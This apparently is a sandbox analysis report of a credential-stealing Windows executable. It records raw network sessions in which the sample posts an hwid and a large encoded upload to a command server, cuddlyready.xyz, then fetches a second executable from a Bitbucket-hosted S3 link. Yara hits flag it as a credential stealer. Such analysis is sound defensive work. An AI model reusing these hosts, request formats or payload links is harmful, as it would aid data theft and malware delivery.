2024-12-23 07:31:34 UTC  15331  OUT  Data Ascii:
--O1N2OO66DWA6
Content-Disposition: form-data; name="hwid"

82385F47CFFDEF55AC8923850305D13E
--O1N2OO66DWA6
Content-Disposition: form-data; name="pid"

3
--O1N2OO66DWA6
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--O1N2OO66
2024-12-23 07:31:35 UTC  1124  IN  HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:35 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=6lp91pjken09h44480jshret5o; expires=Fri, 18 Apr 2025 01:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZXJN13dxsQgCTb2JMlF6lYmzrts2IGubkoSulV9fSnsslpgify4Dkfd8ab6HqjQTSyS8vawR3gC%2FoVn9QllPhCiUNCVgn9818Z1Da7oaD1EpfEV95zTPJaZtUyxTTveZSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a71ce92d43e3-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1610&rtt_var=620&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21361&delivery_rate=1740166&cwnd=229&unsent_bytes=0&cid=c4e8e435c93e67fd&ts=1162&x=0"
2024-12-23 07:31:35 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:31:35 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.10  49741  172.67.150.173  443  7704  C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:31:37 UTC  276  OUT  POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZZ2FAQATDR3FX5
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1246
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:37 UTC  1246  OUT  Data Ascii:
--ZZ2FAQATDR3FX5
Content-Disposition: form-data; name="hwid"

82385F47CFFDEF55AC8923850305D13E
--ZZ2FAQATDR3FX5
Content-Disposition: form-data; name="pid"

1
--ZZ2FAQATDR3FX5
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--ZZ
2024-12-23 07:31:38 UTC  1126  IN  HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=irs1u8avj8a815rhl40i6a8ukn; expires=Fri, 18 Apr 2025 01:18:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qW3YklbAZHs8%2Fs8%2FaArtLhdHtrTPP2FrZZs5bkvU5aYWMzawoyZGP5DrrwFqFPRx1EHCHAZ6DRUR8N6LT%2BOCgJ2MIEMDoyLWNleG72A8BiOBxrV5Npe18iEa4jM%2BqooxzE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a72f4bff0f77-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1484&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2158&delivery_rate=1967654&cwnd=231&unsent_bytes=0&cid=05b64883bdfcd021&ts=772&x=0"
2024-12-23 07:31:38 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:31:38 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.10  49752  172.67.150.173  443  7704  C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:31:39 UTC  274  OUT  POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DDNDLNQIKL
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 571289
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:39 UTC  15331  OUT  Data Ascii:
--DDNDLNQIKL
Content-Disposition: form-data; name="hwid"

82385F47CFFDEF55AC8923850305D13E
--DDNDLNQIKL
Content-Disposition: form-data; name="pid"

1
--DDNDLNQIKL
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--DDNDLNQIKL
Co
                                                                                                                                                                              Data Ascii: tH-~Sj+7{yHH[]CE1"bg:@YjA2,lH~`>}x<8QOMI GJG'2:ws(G2]^x='11w~w\`jU?3'GjJj/cmpsIEq,
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 65 c7 fb ac 97 1d 20 a9 31 15 33 a2 21 1c df 44 2a 9e 44 6d 32 7f ad 82 b6 12 4b a3 10 88 c9 88 fd 00 8d 07 59 a2 04 04 7e a8 25 2c 03 1c c1 d3 07 1e d3 1d 40 a6 44 7f 85 7e d8 af 49 8f 45 4e 21 91 3d 0d 16 c4 99 8c 49 da 4e c3 0d dc 6c 60 93 2b 75 fd 5f 93 b0 2f 26 53 b8 ce 08 a7 5d fb 1a 0d 9e a7 14 3d ef 6c b0 f5 40 3d 00 59 f1 97 f7 32 df bf 7f 3e ec 38 ac 10 95 05 93 6f 76 50 bd 33 8d ec 16 cf 19 11 52 a6 63 23 d1 31 fe 5f 68 04 89 88 9e b4 c2 73 5e 2c ed 58 af 7b 08 f1 cf 69 23 16 66 37 bb f5 cf 67 06 09 4d e5 9b 29 fc 58 6c 1e 21 16 40 4b 7b 96 ec 80 ad 1e 09 6f 01 50 22 ff ee 00 27 12 52 6f 8e bd 72 4f a6 d8 bb 7f 90 c1 8f 85 4d ae ab a8 fe 62 bd 06 23 eb 3c d4 77 be ce 64 2e d3 77 ef 46 f0 3e a0 ff 13 fc 1f 76 eb ac 0d fd 7c 02 51 22 42 cf 94 d9
                                                                                                                                                                              Data Ascii: e 13!D*Dm2KY~%,@D~IEN!=INl`+u_/&S]=l@=Y2>8ovP3Rc#1_hs^,X{i#f7gM)Xl!@K{oP"'RorOMb#<wd.wF>v|Q"B
                                                                                                                                                                              2024-12-23 07:31:39 UTC15331OUTData Raw: 5f b0 a5 ce 70 b8 58 01 d7 92 a9 76 37 1a 13 ac 1d 95 6f 5a 0b 2b d5 03 55 8d 1c 03 63 7e 4b d2 da b4 71 f9 f7 5a fb b1 9e 1f e8 b2 0d d4 da 86 a1 33 03 30 3e 21 40 f8 d7 eb 28 14 37 95 0f d9 d7 a1 99 67 4b 95 3f c1 56 be 5e 0d 68 26 f3 f1 bc ec 27 38 13 85 42 01 56 4f 19 a0 fb 45 c1 a7 79 4a 6e 52 ff 8d 1d be 15 43 e9 84 80 e5 41 54 9a 27 f0 7e f6 6f 31 5b aa 83 d9 5c 59 19 10 f0 3c 1c d0 83 46 1d ae 72 2e 02 5a 1f e6 5a b7 30 cb 9f 07 f0 70 76 13 c8 61 6c 7d 88 15 1d 1c e1 5b fa 30 fe c8 b8 27 ef 7f 0d 70 84 59 fc 47 14 d3 fd 57 fd 73 8b 11 c1 25 e4 cc d2 48 cb 04 66 c7 ce 13 53 fc 26 11 75 f8 6d e1 ba bd e5 1a a5 2d bc 09 77 eb 7c 9d 78 df 24 8a ae be a4 3b df 68 a4 07 60 80 c7 48 50 f6 8b b7 ff 66 f9 f7 34 65 73 8d a4 b3 04 ef 2a 41 9a 27 dd d9 9b 73
                                                                                                                                                                              Data Ascii: _pXv7oZ+Uc~KqZ30>!@(7gK?V^h&'8BVOEyJnRCAT'~o1[\Y<Fr.ZZ0pval}[0'pYGWs%HfS&um-w|x$;h`HPf4es*A's
2024-12-23 07:31:44 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:43 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9ctjs2kop0bul2rod8ng4fmg5l; expires=Fri, 18 Apr 2025 01:18:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LdL25cyruppoisjuokn8qGzv0ift4S3mLv%2FdnSi3hGSvRxKSEeZKW9igTwv5Lcpm4C8%2B2qArq8DYCsz1qX3Hs0LxDwSIMoJZRsQ3NdLCm9voSX9nhbEF79adIRDVdUVj0A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a73f4e1e19c7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1770&rtt_var=682&sent=339&recv=592&lost=0&retrans=0&sent_bytes=2837&recv_bytes=573827&delivery_rate=1584373&cwnd=146&unsent_bytes=0&cid=0d8c75d86fe40264&ts=4166&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49763 | 172.67.150.173 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:45 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:45 UTC | 88 | OUT | Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=82385F47CFFDEF55AC8923850305D13E
2024-12-23 07:31:46 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:45 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9mk3g8akmh2rtsj8231cijbglj; expires=Fri, 18 Apr 2025 01:18:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nl0CIqsY%2BFQC6BiEP1CNp5DI4of%2Br7e8OtgTNqr43JnQ0ysvgvC3yif1aNX5WoEvpu0gNkBHQD2wTFtKOUeRQkFKxsZ0mIBYx%2BZDGyX8hWisXa9RihesKkZ4L8cToX7oI7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a7619ef1420d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1819&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1605277&cwnd=244&unsent_bytes=0&cid=c9e496c8545d5b60&ts=774&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49769 | 185.166.143.49 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:47 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bitbucket.org
2024-12-23 07:31:48 UTC | 5943 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:48 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWo [TRUNCATED]
                                                                                                                                                                              Expires: Mon, 23 Dec 2024 07:31:48 GMT
                                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                                              X-Served-By: e253b34248ef
                                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                                              X-Request-Count: 884
                                                                                                                                                                              X-Render-Time: 0.07326650619506836
                                                                                                                                                                              X-B3-Traceid: a711a345df084811a9c44ef7fa39b262
                                                                                                                                                                              X-B3-Spanid: 2f51f8942aed4d54
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED]
                                                                                                                                                                              X-Usage-Quota-Remaining: 999034.004
                                                                                                                                                                              X-Usage-Request-Cost: 986.83
                                                                                                                                                                              X-Usage-User-Time: 0.023771
                                                                                                                                                                              X-Usage-System-Time: 0.005834
                                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                                              Age: 0
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                              Atl-Traceid: a711a345df084811a9c44ef7fa39b262
                                                                                                                                                                              Atl-Request-Id: a711a345-df08-4811-a9c4-4ef7fa39b262
                                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                              Server-Timing: atl-edge;dur=184,atl-edge-internal;dur=4,atl-edge-upstream;dur=182,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49775 | 52.217.136.89 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              2024-12-23 07:31:50 UTC1352OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWou94jMnJQS46uxs8Ju0vMuJyGP%2Fm9Pv%2B9rjrr05WM [TRUNCATED]
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
2024-12-23 07:31:50 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              x-amz-id-2: 7gOx00Z8Ctw7gg8POxX541x8xBLcZcS4LcLXnjBx7cnqknhLvNHcrf0iGLYGTkIQkOZv0gfkuxY=
                                                                                                                                                                              x-amz-request-id: PXTKA8RFGS3SE8AX
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:51 GMT
                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                              Connection: close



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:02:31:19
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\mG83m82qhF.exe"
                                                                                                                                                                              Imagebase:0x410000
                                                                                                                                                                              File size:2'982'400 bytes
                                                                                                                                                                              MD5 hash:B51D856B18ECFAD7B127881F7819409B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455318191.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454724980.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456122443.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454957001.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455686356.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455516828.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456773192.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456839533.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455085981.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455783102.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456317993.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454484117.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454264424.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:02:31:52
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
